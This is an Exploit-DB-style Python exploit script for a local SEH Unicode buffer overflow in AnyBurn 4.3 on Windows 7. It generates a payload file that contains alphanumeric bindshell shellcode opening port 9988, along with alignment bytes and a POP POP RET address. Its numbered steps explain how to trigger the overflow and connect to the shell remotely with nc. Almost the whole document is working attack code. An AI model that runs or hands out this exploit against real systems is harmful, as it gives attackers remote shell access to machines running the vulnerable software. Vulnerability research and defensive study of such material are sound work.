#!/usr/bin/env python
# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002
# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now'
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'
# alphanumeric bindshell - port 9988, courtesy of b33f
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")
# total payload length 10000
align = (
"\x55" #push EBP - closer register to our shellcode, from where we are pivoting
"\x6e" #Venetian Padding
"\x58" #pop EAX
"\x6e" #Venetian Padding
"\x05\x22\x11" #add eax,0x11002200 \
"\x6e" #Venetian Padding |> +0xB00
"\x2d\x17\x11" #sub eax,0x11001700 /
"\x6e" #Venetian Padding
"\x50" #push EAX
"\x6e" #Venetian Padding
"\xC3") #RETN
nseh = "\x94\x94" # ANSI x94 translates to Unicode 201D
seh = "\xb5\x4d" # 0x004d00b5 POP POP RET in AnyBurn.exe module
preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes lasagna payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"